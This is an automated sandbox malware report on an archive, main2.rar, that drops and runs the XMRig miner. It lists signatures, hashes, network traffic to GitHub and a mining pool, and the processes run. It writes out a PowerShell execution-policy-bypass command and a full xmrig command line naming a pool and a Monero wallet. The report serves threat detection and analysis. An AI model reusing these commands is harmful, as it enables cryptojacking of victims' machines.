Analysis Overview
SHA256
08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Threat Level: Known bad
The file main2.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 13:33
Signatures
Analysis: behavioral11
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:33
Platform
win10v2004-20240426-en
Max time kernel
1799s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2136 wrote to memory of 2740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2136 wrote to memory of 2740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.65.42.20.in-addr.arpa | udp |
Files
memory/2136-0-0x00007FF83C2D3000-0x00007FF83C2D5000-memory.dmp
memory/2136-10-0x000001E272010000-0x000001E272032000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mvomhzn3.mij.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2136-11-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2136-12-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2136-14-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2136-15-0x000001E272400000-0x000001E272412000-memory.dmp
memory/2136-16-0x000001E272050000-0x000001E27205A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2740-47-0x0000022BB4D50000-0x0000022BB4D70000-memory.dmp
memory/2740-48-0x0000022BB4DA0000-0x0000022BB4DC0000-memory.dmp
memory/2740-49-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2136-50-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2740-54-0x0000022C47980000-0x0000022C479A0000-memory.dmp
memory/2740-53-0x0000022C47750000-0x0000022C47770000-memory.dmp
memory/2136-52-0x00007FF83C2D3000-0x00007FF83C2D5000-memory.dmp
memory/2740-51-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2136-55-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2740-56-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2136-57-0x00007FF83C2D0000-0x00007FF83CD91000-memory.dmp
memory/2740-58-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-60-0x0000022C47980000-0x0000022C479A0000-memory.dmp
memory/2740-59-0x0000022C47750000-0x0000022C47770000-memory.dmp
memory/2740-61-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-62-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-63-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-64-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-65-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-66-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-67-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-68-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-69-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-70-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-71-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-72-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-73-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-74-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-75-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-76-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-77-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-78-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-79-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-80-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-81-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-82-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-83-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-84-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-85-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-86-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-87-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-88-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-89-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-90-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-91-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-92-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-93-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-94-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-95-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-96-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-97-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-98-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-99-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-100-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-101-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-102-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-103-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-104-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-105-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-106-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-107-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-108-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-109-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-110-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-111-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-112-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-113-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-114-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-115-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-116-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-117-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-118-0x00007FF761540000-0x00007FF762173000-memory.dmp
memory/2740-119-0x00007FF761540000-0x00007FF762173000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:44
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2236 wrote to memory of 2056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2236 wrote to memory of 2056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
memory/2236-0-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp
memory/2236-5-0x0000017F53840000-0x0000017F53862000-memory.dmp
memory/2236-8-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp
memory/2236-9-0x0000017F6C070000-0x0000017F6C0E6000-memory.dmp
memory/2236-10-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qao0hgxn.ozr.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2236-25-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp
memory/2236-48-0x0000017F6C010000-0x0000017F6C022000-memory.dmp
memory/2236-61-0x0000017F53920000-0x0000017F5392A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2056-90-0x0000012F163A0000-0x0000012F163C0000-memory.dmp
memory/2236-91-0x00007FFA72F73000-0x00007FFA72F74000-memory.dmp
memory/2236-92-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp
memory/2056-93-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2236-94-0x00007FFA72F70000-0x00007FFA7395C000-memory.dmp
memory/2056-95-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-96-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-97-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-98-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-99-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-100-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-101-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-102-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-103-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-104-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-105-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-106-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-107-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-108-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-109-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-110-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-111-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-112-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-113-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-114-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-115-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-116-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-117-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-118-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-119-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-120-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-121-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-122-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-123-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-124-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-125-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-126-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-127-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-128-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-129-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-130-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-131-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-132-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-133-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-134-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-135-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-136-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-137-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-138-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-139-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-140-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-141-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-142-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-143-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-144-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-145-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-146-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-147-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-148-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-149-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-150-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-151-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-152-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-153-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-154-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-155-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
memory/2056-156-0x00007FF6B43A0000-0x00007FF6B4FD3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:44
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1757s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
